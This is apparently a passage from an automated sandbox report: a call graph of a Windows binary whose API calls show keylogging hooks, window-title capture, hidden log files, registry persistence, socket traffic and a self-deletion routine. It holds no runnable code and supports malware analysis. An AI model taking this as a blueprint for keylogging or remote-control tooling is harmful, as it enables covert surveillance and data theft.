58903->58914 58908 c5ce6 28 API calls 58908->58914 58909 c275c 28 API calls 58909->58914 58911 c1eea 26 API calls 58911->58914 58912 c1e13 26 API calls 58912->58914 58914->58855 58914->58858 58914->58862 58914->58864 58914->58870 58914->58871 58914->58873 58914->58880 58914->58887 58914->58888 58914->58889 58914->58892 58914->58893 58914->58894 58914->58895 58914->58896 58914->58899 58914->58900 58914->58901 58914->58908 58914->58909 58914->58911 58914->58912 59381 d3f9a 58914->59381 59386 c41f1 58914->59386 59393 c4915 58914->59393 59408 c428c connect 58914->59408 59468 da96d 58914->59468 59471 d3683 58914->59471 59474 ccbf1 58914->59474 59480 dadee 58914->59480 59483 daca0 58914->59483 59485 dac52 58914->59485 59490 ce679 GetLocaleInfoA 58914->59490 59493 c27ec 58914->59493 59497 c4468 58914->59497 59512 c45d5 58914->59512 58916->58880 59710 d9e89 103 API calls 58916->59710 58917->58880 58918->58880 58919->58338 58920->58348 58923 c85c0 58922->58923 58924 c2e78 28 API calls 58923->58924 58925 c85e4 58924->58925 58925->58369 58927 d24e1 RegQueryValueExA RegCloseKey 58926->58927 58928 d250b 58926->58928 58927->58928 58928->58366 58929->58374 58930->58401 58931->58393 58932->58385 58933->58400 58935 cc8ba 58934->58935 58936 cc90f 58935->58936 58937 cc8da 58935->58937 58938 cc8d0 58935->58938 58941 db15b GetCurrentProcess 58936->58941 59711 da74b 29 API calls 58937->59711 58940 cca03 GetLongPathNameW 58938->58940 58943 c3b40 28 API calls 58940->58943 58944 cc914 58941->58944 58942 cc8e3 58945 c1e18 26 API calls 58942->58945 58946 cca18 58943->58946 58947 cc918 58944->58947 58948 cc96a 58944->58948 58949 cc8ed 58945->58949 58950 c3b40 28 API calls 58946->58950 58952 c3b40 28 API calls 58947->58952 58951 c3b40 28 API calls 58948->58951 58956 c1e13 26 API calls 58949->58956 58953 cca27 58950->58953 58954 cc978 58951->58954 58955 cc926 58952->58955 59714 ccc37 28 API calls 58953->59714 58959 c3b40 28 API calls 58954->58959 58960 c3b40 28 API calls 58955->58960 58956->58938 58958 cca3a 59715 c2860 28 API calls 58958->59715 58962 cc98e 58959->58962 58963 cc93c 58960->58963 59713 c2860 28 API calls 58962->59713 59712 c2860 28 API calls 58963->59712 58964 cca45 59716 c2860 28 API calls 58964->59716 58968 cca4f 58971 c1e13 26 API calls 58968->58971 58969 cc999 58972 c1e18 26 API calls 58969->58972 58970 cc947 58973 c1e18 26 API calls 58970->58973 58974 cca59 58971->58974 58975 cc9a4 58972->58975 58976 cc952 58973->58976 58977 c1e13 26 API calls 58974->58977 58978 c1e13 26 API calls 58975->58978 58979 c1e13 26 API calls 58976->58979 58980 cca62 58977->58980 58981 cc9ad 58978->58981 58982 cc95b 58979->58982 58983 c1e13 26 API calls 58980->58983 58984 c1e13 26 API calls 58981->58984 58985 c1e13 26 API calls 58982->58985 58986 cca6b 58983->58986 58984->58949 58985->58949 58987 c1e13 26 API calls 58986->58987 58988 cca74 58987->58988 58989 c1e13 26 API calls 58988->58989 58990 cca7d 58989->58990 58990->58447 58991->58458 58992->58481 58994 d26a7 58993->58994 58995 d2683 RegQueryValueExA RegCloseKey 58993->58995 58994->58440 58995->58994 58996->58473 58997->58509 58998->58519 58999->58543 59000->58531 59001->58565 59003 c1e0c 59002->59003 59004->58392 59007 da65c LoadResource LockResource SizeofResource 59006->59007 59008 ce183 59006->59008 59007->59008 59008->58621 59010 c1f8e 59009->59010 59016 c2325 59010->59016 59012 c1fa4 59012->58625 59014 c1f86 28 API calls 59013->59014 59015 c6066 59014->59015 59015->58632 59017 c232f 59016->59017 59019 c233a 59017->59019 59020 c294a 28 API calls 59017->59020 59019->59012 59020->59019 59022 c250d 59021->59022 59024 c252b 59022->59024 59025 c261a 28 API calls 59022->59025 59024->58636 59025->59024 59031 c3c30 59026->59031 59029->58657 59030->58638 59032 c3c39 59031->59032 59035 c3c59 59032->59035 59036 c3c68 59035->59036 59041 c32a4 59036->59041 59038 c3c74 59039 c2325 28 API calls 59038->59039 59040 c3b73 59039->59040 59040->58657 59042 c32ad 59041->59042 59043 c32b0 59041->59043 59042->59038 59046 c32b6 28 API calls 59043->59046 59047->58661 59048->58666 59049->58663 59052 c2e85 59051->59052 59053 c2e98 59052->59053 59055 c2ea9 59052->59055 59056 c2eae 59052->59056 59058 c3445 28 API calls 59053->59058 59055->58676 59056->59055 59059 c225b 26 API calls 59056->59059 59058->59055 59059->59055 59061 c4bd0 59060->59061 59064 c245c 59061->59064 59063 c4be4 59063->58679 59065 c2469 59064->59065 59067 c2478 59065->59067 59068 c2ad3 28 API calls 59065->59068 59067->59063 59068->59067 59069->58683 59070->58685 59072 c1e94 59071->59072 59074 db168 GetCurrentProcess 59073->59074 59075 da471 59073->59075 59074->59075 59076 d2513 RegOpenKeyExA 59075->59076 59077 d2541 RegQueryValueExA RegCloseKey 59076->59077 59078 d2569 59076->59078 59077->59078 59079 c1f66 28 API calls 59078->59079 59080 d257e 59079->59080 59080->58700 59081->58709 59083 cb02f 59082->59083 59086 cb04b 59083->59086 59085 cb045 59085->58719 59087 cb055 59086->59087 59089 cb060 59087->59089 59090 cb138 28 API calls 59087->59090 59089->59085 59090->59089 59091->58723 59092->58725 59094 c230d 59093->59094 59095 c2325 28 API calls 59094->59095 59096 c1f80 59095->59096 59096->58452 59115 fa545 59097->59115 59099 f998b 59124 f92de 38 API calls 3 library calls 59099->59124 59100 f9965 59122 105354 20 API calls _free 59100->59122 59101 f9950 59101->59099 59101->59100 59114 cdd54 59101->59114 59104 f996a 59123 fa827 26 API calls _Deallocate 59104->59123 59107 f9997 59108 f99c6 59107->59108 59125 fa58a 42 API calls __Tolower 59107->59125 59111 f9a32 59108->59111 59126 fa4f1 26 API calls 2 library calls 59108->59126 59127 fa4f1 26 API calls 2 library calls 59111->59127 59112 f9af9 _strftime 59112->59114 59128 105354 20 API calls _free 59112->59128 59114->58467 59114->58469 59116 fa55d 59115->59116 59117 fa54a 59115->59117 59116->59101 59129 105354 20 API calls _free 59117->59129 59119 fa54f 59130 fa827 26 API calls _Deallocate 59119->59130 59121 fa55a 59121->59101 59122->59104 59123->59114 59124->59107 59125->59107 59126->59111 59127->59112 59128->59114 59129->59119 59130->59121 59135 c1e9b 59131->59135 59133 c27d9 59133->58764 59134->58768 59136 c1ea7 59135->59136 59137 c245c 28 API calls 59136->59137 59138 c1eb9 59137->59138 59138->59133 59140 c9855 59139->59140 59141 d24b7 3 API calls 59140->59141 59142 c985c 59141->59142 59143 c988a 59142->59143 59144 c9870 59142->59144 59158 c82dc 59143->59158 59145 c9875 59144->59145 59146 c95cf 59144->59146 59148 c82dc 28 API calls 59145->59148 59146->58504 59150 c9883 59148->59150 59184 c9959 29 API calls 59150->59184 59153 c9888 59153->59146 59154->58794 59325 c2d8b 59155->59325 59157 c28dd 59157->58797 59159 c82eb 59158->59159 59185 c8431 59159->59185 59161 c8309 59162 c98a5 59161->59162 59190 caffa 59162->59190 59165 c98ce 59167 c1f66 28 API calls 59165->59167 59166 c98f6 59168 c1f66 28 API calls 59166->59168 59169 c98d8 59167->59169 59170 c9901 59168->59170 59171 dae08 28 API calls 59169->59171 59172 c1f66 28 API calls 59170->59172 59173 c98e6 59171->59173 59174 c9910 59172->59174 59194 ca876 31 API calls ___crtLCMapStringA 59173->59194 59176 da686 79 API calls 59174->59176 59178 c9915 CreateThread 59176->59178 59177 c98ed 59179 c1eea 26 API calls 59177->59179 59180 c993c CreateThread 59178->59180 59181 c9930 CreateThread 59178->59181 59206 c99a9 59178->59206 59179->59166 59182 c1e13 26 API calls 59180->59182 59203 c99b5 59180->59203 59181->59180 59200 c9993 59181->59200 59183 c9950 59182->59183 59183->59146 59184->59153 59324 c999f 135 API calls 59184->59324 59186 c843d 59185->59186 59188 c845b 59186->59188 59189 c2f0d 28 API calls 59186->59189 59188->59161 59189->59188 59192 cb006 59190->59192 59191 c98c3 59191->59165 59191->59166 59192->59191 59195 c3b9e 59192->59195 59194->59177 59196 c3ba8 59195->59196 59198 c3bb3 59196->59198 59199 c3cfd 28 API calls 59196->59199 59198->59191 59199->59198 59209 c99e4 59200->59209 59242 ca3f4 59203->59242 59279 c9e48 59206->59279 59210 c99ff GetModuleHandleA SetWindowsHookExA 59209->59210 59211 c9a63 KiUserCallbackDispatcher 59209->59211 59210->59211 59212 c9a1b GetLastError 59210->59212 59213 c999c 59211->59213 59214 c9a75 TranslateMessage DispatchMessageA 59211->59214 59224 dad46 59212->59224 59214->59211 59214->59213 59218 c9a3e 59219 c1f66 28 API calls 59218->59219 59220 c9a4d 59219->59220 59221 da686 79 API calls 59220->59221 59222 c9a52 59221->59222 59223 c1eea 26 API calls 59222->59223 59223->59213 59230 100c51 59224->59230 59227 c1f66 28 API calls 59228 c9a31 59227->59228 59229 c4c9e 28 API calls 59228->59229 59229->59218 59231 100c5d 59230->59231 59234 100a4d 59231->59234 59235 100a64 59234->59235 59238 dad67 59235->59238 59240 105354 20 API calls _free 59235->59240 59237 100a9b 59241 fa827 26 API calls _Deallocate 59237->59241 59238->59227 59240->59237 59241->59238 59270 ca402 59242->59270 59243 c99be 59244 ca45c Sleep GetForegroundWindow GetWindowTextLengthW 59245 cb027 28 API calls 59244->59245 59245->59270 59249 daca0 GetTickCount 59249->59270 59250 ca4a2 GetWindowTextW 59250->59270 59252 c1e13 26 API calls 59252->59270 59253 caffa 28 API calls 59253->59270 59254 ca5ff 59255 c1e13 26 API calls 59254->59255 59255->59243 59256 ca569 Sleep 59256->59270 59257 100c51 26 API calls 59257->59270 59259 c1f66 28 API calls 59259->59270 59260 ca4f1 59262 c82dc 28 API calls 59260->59262 59260->59270 59275 ca876 31 API calls ___crtLCMapStringA 59260->59275 59262->59260 59264 c5ce6 28 API calls 59264->59270 59266 c28cf 28 API calls 59266->59270 59267 c9d58 27 API calls 59267->59270 59268 dae08 28 API calls 59268->59270 59269 c1eea 26 API calls 59269->59270 59270->59243 59270->59244 59270->59249 59270->59250 59270->59252 59270->59253 59270->59254 59270->59256 59270->59257 59270->59259 59270->59260 59270->59264 59270->59266 59270->59267 59270->59268 59270->59269 59271 f3519 5 API calls __Init_thread_wait 59270->59271 59272 f38a5 29 API calls __onexit 59270->59272 59273 f34cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 59270->59273 59274 c82a8 28 API calls 59270->59274 59276 cb0dd 28 API calls 59270->59276 59277 cae58 44 API calls 2 library calls 59270->59277 59278 c4c9e 28 API calls 59270->59278 59271->59270 59272->59270 59273->59270 59274->59270 59275->59260 59276->59270 59277->59270 59278->59270 59280 c9e5d Sleep 59279->59280 59299 c9d97 59280->59299 59282 c99b2 59283 c9eae GetFileAttributesW 59289 c9e6f 59283->59289 59284 c9e9d CreateDirectoryW 59284->59289 59285 c9ec5 SetFileAttributesW 59285->59289 59287 c9f10 59288 c9f3f PathFileExistsW 59287->59288 59292 c1f86 28 API calls 59287->59292 59293 ca048 SetFileAttributesW 59287->59293 59294 c1eea 26 API calls 59287->59294 59295 c6052 28 API calls 59287->59295 59296 c1eef 26 API calls 59287->59296 59298 c1eea 26 API calls 59287->59298 59321 db61a 32 API calls 59287->59321 59322 db687 CreateFileW SetFilePointer WriteFile CloseHandle 59287->59322 59288->59287 59289->59280 59289->59282 59289->59283 59289->59284 59289->59285 59289->59287 59290 c1d64 28 API calls 59289->59290 59312 db58f 59289->59312 59290->59289 59292->59287 59293->59289 59294->59287 59295->59287 59296->59287 59298->59289 59300 c9e44 59299->59300 59302 c9dad 59299->59302 59300->59289 59301 c9dcc CreateFileW 59301->59302 59303 c9dda GetFileSize 59301->59303 59302->59301 59304 c9e0f CloseHandle 59302->59304 59305 c9e21 59302->59305 59306 c9dfd 59302->59306 59307 c9e04 Sleep 59302->59307 59303->59302 59303->59304 59304->59302 59305->59300 59309 c82dc 28 API calls 59305->59309 59323 ca7f0 83 API calls 59306->59323 59307->59304 59310 c9e3d 59309->59310 59311 c98a5 126 API calls 59310->59311 59311->59300 59313 db5a2 CreateFileW 59312->59313 59315 db5df 59313->59315 59316 db5db 59313->59316 59317 db5f6 WriteFile 59315->59317 59318 db5e6 SetFilePointer 59315->59318 59316->59289 59319 db60b CloseHandle 59317->59319 59320 db609 59317->59320 59318->59317 59318->59319 59319->59316 59320->59319 59321->59287 59322->59287 59323->59307 59326 c2d97 59325->59326 59329 c30f7 59326->59329 59328 c2dab 59328->59157 59330 c3101 59329->59330 59332 c3115 59330->59332 59333 c36c2 28 API calls 59330->59333 59332->59328 59333->59332 59335 c3b48 59334->59335 59341 c3b7a 59335->59341 59338 c3cbb 59345 c3dc2 59338->59345 59340 c3cc9 59340->58805 59342 c3b86 59341->59342 59343 c3b9e 28 API calls 59342->59343 59344 c3b5a 59343->59344 59344->59338 59346 c3dce 59345->59346 59349 c2ffd 59346->59349 59348 c3de3 59348->59340 59350 c300e 59349->59350 59351 c32a4 28 API calls 59350->59351 59352 c301a 59351->59352 59354 c302e 59352->59354 59355 c35e8 28 API calls 59352->59355 59354->59348 59355->59354 59362 f95ba 59356->59362 59360 d27ed RegSetValueExA RegCloseKey 59359->59360 59361 d2814 59359->59361 59360->59361 59361->58830 59365 f953b 59362->59365 59364 c1608 59364->58828 59366 f955e 59365->59366 59367 f954a 59365->59367 59372 f955a __alldvrm 59366->59372 59375 107601 11 API calls 2 library calls 59366->59375 59373 105354 20 API calls _free 59367->59373 59369 f954f 59374 fa827 26 API calls _Deallocate 59369->59374 59372->59364 59373->59369 59374->59372 59375->59372 59377 daab9 _Yarn ___scrt_fastfail 59376->59377 59378 c1f66 28 API calls 59377->59378 59379 dab2e 59378->59379 59379->58834 59380->58850 59382 d3fa9 59381->59382 59383 d3fb3 getaddrinfo WSASetLastError 59381->59383 59532 d3e37 35 API calls ___std_exception_copy 59382->59532 59383->58914 59385 d3fae 59385->59383 59387 c41fd 59386->59387 59388 c4206 socket 59386->59388 59533 c4262 WSAStartup 59387->59533 59390 c4224 CreateEventW 59388->59390 59391 c4220 59388->59391 59390->58914 59391->58914 59392 c4202 59392->59388 59392->59391 59394 c49b1 59393->59394 59395 c492a 59393->59395 59394->58914 59396 c4933 59395->59396 59397 c4987 CreateEventA CreateThread 59395->59397 59398 c4942 GetLocalTime 59395->59398 59396->59397 59397->59394 59535 c4b1d 59397->59535 59399 dad46 28 API calls 59398->59399 59400 c495b 59399->59400 59534 c4c9e 28 API calls 59400->59534 59402 c4968 59403 c1f66 28 API calls 59402->59403 59404 c4977 59403->59404 59405 da686 79 API calls 59404->59405 59406 c497c 59405->59406 59407 c1eea 26 API calls 59406->59407 59407->59397 59409 c43e1 59408->59409 59410 c42b3 59408->59410 59411 c4343 59409->59411 59412 c43e7 WSAGetLastError 59409->59412 59410->59411 59413 c42e8 59410->59413 59416 c4cbf 28 API calls 59410->59416 59411->58914 59412->59411 59414 c43f7 59412->59414 59539 e0151 27 API calls 59413->59539 59417 c43fc 59414->59417 59418 c42f7 59414->59418 59420 c42d4 59416->59420 59544 dbc76 30 API calls 59417->59544 59423 c1f66 28 API calls 59418->59423 59419 c42f0 59419->59418 59422 c4306 59419->59422 59424 c1f66 28 API calls 59420->59424 59433 c434c 59422->59433 59434 c4315 59422->59434 59426 c4448 59423->59426 59427 c42e3 59424->59427 59425 c440b 59545 c4c9e 28 API calls 59425->59545 59430 c1f66 28 API calls 59426->59430 59431 da686 79 API calls 59427->59431 59429 c4418 59432 c1f66 28 API calls 59429->59432 59435 c4457 59430->59435 59431->59413 59436 c4427 59432->59436 59541 e0f34 56 API calls 59433->59541 59438 c1f66 28 API calls 59434->59438 59439 da686 79 API calls 59435->59439 59440 da686 79 API calls 59436->59440 59442 c4324 59438->59442 59439->59411 59443 c442c 59440->59443 59441 c4354 59444 c4389 59441->59444 59445 c4359 59441->59445 59446 c1f66 28 API calls 59442->59446 59447 c1eea 26 API calls 59443->59447 59543 e02ea 28 API calls 59444->59543 59448 c1f66 28 API calls 59445->59448 59449 c4333 59446->59449 59447->59411 59451 c4368 59448->59451 59452 da686 79 API calls 59449->59452 59455 c1f66 28 API calls 59451->59455 59456 c4338 59452->59456 59453 c4391 59454 c43be CreateEventW CreateEventW 59453->59454 59457 c1f66 28 API calls 59453->59457 59454->59411 59458 c4377 59455->59458 59540 ddc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 59456->59540 59459 c43a7 59457->59459 59460 da686 79 API calls 59458->59460 59462 c1f66 28 API calls 59459->59462 59463 c437c 59460->59463 59464 c43b6 59462->59464 59542 e0592 54 API calls 59463->59542 59466 da686 79 API calls 59464->59466 59467 c43bb 59466->59467 59467->59454 59546 da945 GlobalMemoryStatusEx 59468->59546 59470 da982 59470->58914 59547 d3646 59471->59547 59475 ccc0d 59474->59475 59476 d246e 3 API calls 59475->59476 59478 ccc14 59476->59478 59477 ccc2c 59477->58914 59478->59477 59479 d24b7 3 API calls 59478->59479 59479->59477 59481 c1f86 28 API calls 59480->59481 59482 dae03 59481->59482 59482->58914 59484 dacb6 GetTickCount 59483->59484 59484->58914 59486 f6050 ___scrt_fastfail 59485->59486 59487 dac71 GetForegroundWindow GetWindowTextW 59486->59487 59488 c3b40 28 API calls 59487->59488 59489 dac9b 59488->59489 59489->58914 59491 c1f66 28 API calls 59490->59491 59492 ce69e 59491->59492 59492->58914 59494 c27f8 59493->59494 59495 c2e78 28 API calls 59494->59495 59496 c2814 59495->59496 59496->58914 59498 c447b 59497->59498 59588 c4be8 59498->59588 59500 c4490 _Yarn 59501 c4507 WaitForSingleObject 59500->59501 59502 c44e7 59500->59502 59504 c451d 59501->59504 59503 c44f9 send 59502->59503 59505 c4542 59503->59505 59592 e051a 56 API calls 59504->59592 59508 c1eea 26 API calls 59505->59508 59507 c4530 SetEvent 59507->59505 59509 c454a 59508->59509 59510 c1eea 26 API calls 59509->59510 59511 c4552 59510->59511 59511->58914 59518 c45ec 59512->59518 59513 fa88c ___crtLCMapStringA 21 API calls 59513->59518 59515 c1f86 28 API calls 59515->59518 59516 c4666 59615 c47eb 98 API calls 59516->59615 59517 c1eef 26 API calls 59517->59518 59518->59513 59518->59515 59518->59516 59518->59517 59520 c1eea 26 API calls 59518->59520 59598 c455b 59518->59598 59604 c4688 59518->59604 59520->59518 59521 c466d 59522 c1eea 26 API calls 59521->59522 59523 c4676 59522->59523 59524 c1eea 26 API calls 59523->59524 59525 c467f 59524->59525 59525->58914 59527->58914 59528->58880 59529->58880 59530->58880 59531->58880 59532->59385 59533->59392 59534->59402 59538 c4b29 101 API calls 59535->59538 59537 c4b26 59538->59537 59539->59419 59540->59411 59541->59441 59542->59456 59543->59453 59544->59425 59545->59429 59546->59470 59550 d3619 59547->59550 59551 d362e ___scrt_initialize_default_local_stdio_options 59550->59551 59554 fe2dd 59551->59554 59557 fb030 59554->59557 59558 fb058 59557->59558 59559 fb070 59557->59559 59581 105354 20 API calls _free 59558->59581 59559->59558 59561 fb078 59559->59561 59583 f92de 38 API calls 3 library calls 59561->59583 59562 fb05d 59582 fa827 26 API calls _Deallocate 59562->59582 59565 fb088 59584 fb7b6 20 API calls 2 library calls 59565->59584 59568 d363c 59568->58914 59569 fb100 59585 fbe24 50 API calls 3 library calls 59569->59585 59572 fb068 59574 f3d2c 59572->59574 59573 fb10b 59586 fb820 20 API calls _free 59573->59586 59575 f3d37 IsProcessorFeaturePresent 59574->59575 59576 f3d35 59574->59576 59578 f41a4 59575->59578 59576->59568 59587 f4168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 59578->59587 59580 f4287 59580->59568 59581->59562 59582->59572 59583->59565 59584->59569 59585->59573 59586->59572 59587->59580 59589 c4bf0 59588->59589 59593 c4c0c 59589->59593 59591 c4c06 59591->59500 59592->59507 59594 c4c16 59593->59594 59596 c4c21 59594->59596 59597 c4d07 28 API calls 59594->59597 59596->59591 59597->59596 59599 c4565 WaitForSingleObject 59598->59599 59600 c4592 recv 59598->59600 59616 e0556 56 API calls 59599->59616 59602 c45a5 59600->59602 59602->59518 59603 c4581 SetEvent 59603->59602 59614 c46a3 59604->59614 59605 c47d8 59606 c1eea 26 API calls 59605->59606 59607 c47e1 59606->59607 59607->59518 59608 c1eef 26 API calls 59608->59614 59609 c1eea 26 API calls 59609->59614 59610 c1fbd 28 API calls 59610->59614 59611 c1ebd 28 API calls 59612 c4772 CreateEventA CreateThread WaitForSingleObject CloseHandle 59611->59612 59612->59614 59617 d4b9b 59612->59617 59613 c3b60 28 API calls 59613->59614 59614->59605 59614->59608 59614->59609 59614->59610 59614->59611 59614->59613 59615->59521 59616->59603 59618 c1fbd 28 API calls 59617->59618 59619 d4bbd SetEvent 59618->59619 59620 d4bd2 59619->59620 59621 c3b60 28 API calls 59620->59621 59622 d4bec 59621->59622 59623 c1fbd 28 API calls 59622->59623 59624 d4bfc 59623->59624 59625 c1fbd 28 API calls 59624->59625 59626 d4c0e 59625->59626 59627 dafc3 28 API calls 59626->59627 59628 d4c17 59627->59628 59629 d4c37 GetTickCount 59628->59629 59630 d4d99 59628->59630 59693 d4d8a 59628->59693 59632 dad46 28 API calls 59629->59632 59630->59693 59694 d4dad 59630->59694 59631 c1d8c 26 API calls 59633 d61fb 59631->59633 59634 d4c4d 59632->59634 59636 c1eea 26 API calls 59633->59636 59637 daca0 GetTickCount 59634->59637 59638 d6207 59636->59638 59639 d4c54 59637->59639 59640 c1eea 26 API calls 59638->59640 59641 dad46 28 API calls 59639->59641 59642 d6213 59640->59642 59643 d4c5f 59641->59643 59644 dac52 30 API calls 59643->59644 59645 d4c6d 59644->59645 59696 daec8 59645->59696 59648 c1d64 28 API calls 59649 d4c89 59648->59649 59650 c27ec 28 API calls 59649->59650 59651 d4c97 59650->59651 59700 c275c 59651->59700 59653 d4ca6 59654 c27cb 28 API calls 59653->59654 59655 d4cb5 59654->59655 59656 c275c 28 API calls 59655->59656 59657 d4cc4 59656->59657 59658 c27cb 28 API calls 59657->59658 59659 d4cd0 59658->59659 59660 c275c 28 API calls 59659->59660 59661 d4cda 59660->59661 59662 c4468 60 API calls 59661->59662 59663 d4ce9 59662->59663 59664 c1eea 26 API calls 59663->59664 59665 d4cf2 59664->59665 59666 c1eea 26 API calls 59665->59666 59667 d4cfe 59666->59667 59668 c1eea 26 API calls 59667->59668 59669 d4d0a 59668->59669 59670 c1eea 26 API calls 59669->59670 59671 d4d16 59670->59671 59672 c1eea 26 API calls 59671->59672 59673 d4d22 59672->59673 59674 c1eea 26 API calls 59673->59674 59675 d4d2e 59674->59675 59676 c1e13 26 API calls 59675->59676 59677 d4d3a 59676->59677 59678 c1eea 26 API calls 59677->59678 59679 d4d43 59678->59679 59680 c1eea 26 API calls 59679->59680 59681 d4d4c 59680->59681 59682 c1d64 28 API calls 59681->59682 59683 d4d57 59682->59683 59684 fa5e7 _strftime 42 API calls 59683->59684 59685 d4d64 59684->59685 59686 d4d8f 59685->59686 59687 d4d69 59685->59687 59688 c1d64 28 API calls 59686->59688 59689 d4d77 59687->59689 59690 d4d82 59687->59690 59688->59630 59707 c49ba 81 API calls 59689->59707 59691 c4915 104 API calls 59690->59691 59691->59693 59693->59631 59708 c4ab1 83 API calls 59694->59708 59695 d4d7d 59695->59693 59697 daed5 59696->59697 59698 c1f86 28 API calls 59697->59698 59699 d4c7b 59698->59699 59699->59648 59701 c276b 59700->59701 59702 c27ad 59701->59702 59705 c27a2 59701->59705 59703 c1e9b 28 API calls 59702->59703 59704 c27ab 59703->59704 59704->59653 59709 c2ee5 28 API calls 59705->59709 59707->59695 59708->59695 59709->59704 59711->58942 59712->58970 59713->58969 59714->58958 59715->58964 59716->58968 59721 ce56a 59717->59721 59718 d24b7 3 API calls 59718->59721 59719 ce60e 59723 c82dc 28 API calls 59719->59723 59720 c82dc 28 API calls 59727 ce5a1 59720->59727 59721->59718 59721->59719 59722 ce5fe Sleep 59721->59722 59721->59727 59750 cbf04 59721->59750 59722->59721 59726 ce619 59723->59726 59725 dae08 28 API calls 59725->59727 59728 dae08 28 API calls 59726->59728 59727->59720 59727->59722 59727->59725 59733 c1e13 26 API calls 59727->59733 59735 c1f66 28 API calls 59727->59735 59739 d26d2 29 API calls 59727->59739 59837 d2774 29 API calls 59727->59837 59730 ce625 59728->59730 59838 d2774 29 API calls 59730->59838 59732 ce638 59734 c1e13 26 API calls 59732->59734 59733->59727 59736 ce644 59734->59736 59735->59727 59737 c1f66 28 API calls 59736->59737 59738 ce655 59737->59738 59740 d26d2 29 API calls 59738->59740 59739->59727 59741 ce668 59740->59741 59839 d1699 TerminateProcess WaitForSingleObject 59741->59839 59743 ce670 ExitProcess 59912 d1637 61 API calls 59745->59912 59840 d1699 TerminateProcess WaitForSingleObject 59750->59840 59752 cbf13 59753 cbf26 59752->59753 59841 cafba TerminateThread 59752->59841 59755 cbf36 59753->59755 59862 d8c08 9 API calls 59753->59862 59757 cbf3f 59755->59757 59759 cbf50 59755->59759 59863 db42f 9 API calls 59757->59863 59760 cbf76 59759->59760 59761 d297a 2 API calls 59759->59761 59762 d297a 2 API calls 59760->59762 59763 cbf95 59760->59763 59761->59760 59762->59763 59764 d297a 2 API calls 59763->59764 59765 cbfb2 ___scrt_fastfail 59763->59765 59764->59765 59766 d265d 3 API calls 59765->59766 59767 cc002 59766->59767 59768 cc019 59767->59768 59769 cc009 GetModuleFileNameW 59767->59769 59770 cc020 RegDeleteKeyA 59768->59770 59769->59768 59771 cc03f 59770->59771 59772 cc058 SetFileAttributesW 59771->59772 59773 cc049 59771->59773 59848 dab38 59772->59848 59775 cc055 SetFileAttributesW 59773->59775 59775->59772 59777 dae08 28 API calls 59778 cc086 59777->59778 59779 c28cf 28 API calls 59778->59779 59780 cc094 59779->59780 59781 c1e13 26 API calls 59780->59781 59782 cc09e 59781->59782 59783 c1eea 26 API calls 59782->59783 59784 cc0a7 59783->59784 59785 c3b40 28 API calls 59784->59785 59786 cc0c9 59785->59786 59787 c28cf 28 API calls 59786->59787 59788 cc0d4 59787->59788 59859 c3cdc 59788->59859 59790 cc0e0 59791 c1e13 26 API calls 59790->59791 59792 cc0ea 59791->59792 59793 c1e13 26 API calls 59792->59793 59794 cc0f3 59793->59794 59795 c3b40 28 API calls 59794->59795 59796 cc101 59795->59796 59797 c3cbb 28 API calls 59796->59797 59798 cc110 59797->59798 59799 c1e13 26 API calls 59798->59799 59800 cc11a 59799->59800 59801 cc176 59800->59801 59803 c3b40 28 API calls 59800->59803 59802 c3b40 28 API calls 59801->59802 59805 cc191 59802->59805 59804 cc135 59803->59804 59806 c3cbb 28 API calls 59804->59806 59807 c28cf 28 API calls 59805->59807 59809 cc144 59806->59809 59808 cc19c 59807->59808 59810 c28cf 28 API calls 59808->59810 59811 c28cf 28 API calls 59809->59811 59812 cc1a8 59810->59812 59813 cc150 59811->59813 59814 c1e13 26 API calls 59812->59814 59815 c1e13 26 API calls 59813->59815 59816 cc1bc 59814->59816 59817 cc164 59815->59817 59818 c1e13 26 API calls 59816->59818 59819 c1e13 26 API calls 59817->59819 59820 cc1c5 59818->59820 59821 cc16d 59819->59821 59822 c1e13 26 API calls 59820->59822 59823 c1e13 26 API calls 59821->59823 59824 cc1ce 59822->59824 59823->59801 59829 cc22f 59824->59829 59864 cb0dd 28 API calls 59824->59864 59826 cc206 59827 c28cf 28 API calls 59826->59827 59828 cc212 59827->59828 59830 c1e13 26 API calls 59828->59830 59832 db58f 4 API calls 59829->59832 59831 cc226 59830->59831 59833 c1e13 26 API calls 59831->59833 59834 cc267 59832->59834 59833->59829 59835 cc286 ExitProcess 59834->59835 59836 cc279 ShellExecuteW 59834->59836 59836->59835 59837->59727 59838->59732 59839->59743 59840->59752 59842 caf77 59841->59842 59843 cafd3 UnhookWindowsHookEx TerminateThread 59841->59843 59844 caf83 DeleteFileW 59842->59844 59843->59842 59846 caf9f 59844->59846 59845 cafb5 59845->59753 59846->59845 59847 cafae RemoveDirectoryW 59846->59847 59847->59845 59849 dab48 59848->59849 59865 da45a 59849->59865 59855 cc07b 59855->59777 59856 100a1a 38 API calls 59858 dab7f 59856->59858 59858->59855 59858->59856 59874 dc188 28 API calls 59858->59874 59908 c2daf 59859->59908 59861 c3cea 59861->59790 59862->59755 59863->59759 59864->59826 59866 f95ba 27 API calls 59865->59866 59867 da461 GetCurrentProcessId 59866->59867 59868 100a3b 59867->59868 59875 106ebf GetLastError 59868->59875 59870 dab73 59871 100a1a 59870->59871 59872 106ebf pre_c_initialization 38 API calls 59871->59872 59873 100a1f 59872->59873 59873->59858 59874->59858 59876 106ee1 59875->59876 59877 106ed5 59875->59877 59897 108706 20 API calls 3 library calls 59876->59897 59896 107466 11 API calls 2 library calls 59877->59896 59880 106edb 59880->59876 59882 106f2a SetLastError 59880->59882 59881 106eed 59883 106ef5 59881->59883 59904 1074bc 11 API calls 2 library calls 59881->59904 59882->59870 59898 106ac5 59883->59898 59885 106f0a 59885->59883 59887 106f11 59885->59887 59905 106d31 20 API calls _free 59887->59905 59888 106efb 59889 106f36 SetLastError 59888->59889 59906 1053b6 38 API calls _abort 59889->59906 59891 106f1c 59893 106ac5 _free 20 API calls 59891->59893 59895 106f23 59893->59895 59895->59882 59895->59889 59896->59880 59897->59881 59899 106ad0 RtlFreeHeap 59898->59899 59903 106af9 _free 59898->59903 59900 106ae5 59899->59900 59899->59903 59907 105354 20 API calls _free 59900->59907 59902 106aeb GetLastError 59902->59903 59903->59888 59904->59885 59905->59891 59907->59902 59909 c2dbb 59908->59909 59910 c30f7 28 API calls 59909->59910 59911 c2dcd 59910->59911 59911->59861 59913 fa998 59916 fa9a4 _swprintf __FrameHandler3::FrameUnwindToState 59913->59916 59914 fa9b2 59931 105354 20 API calls _free 59914->59931 59916->59914 59919 fa9dc 59916->59919 59917 fa9b7 59932 fa827 